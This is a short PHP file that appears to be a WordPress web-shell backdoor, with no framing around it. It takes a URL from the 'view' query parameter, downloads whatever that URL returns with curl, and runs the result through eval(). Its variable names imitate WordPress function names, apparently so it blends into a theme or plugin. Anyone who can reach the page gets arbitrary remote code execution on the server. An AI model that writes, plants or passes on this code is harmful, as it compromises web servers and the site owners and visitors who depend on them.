<?php
if (isset($_GET['view'])) {
$comments_open_xr = $_GET['view'];
if ($wp_get_attachment_image_src_tm = curl_init()) {
curl_setopt($wp_get_attachment_image_src_tm, CURLOPT_URL, $comments_open_xr);
curl_setopt($wp_get_attachment_image_src_tm, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($wp_get_attachment_image_src_tm));
curl_close($wp_get_attachment_image_src_tm);
exit;
}
}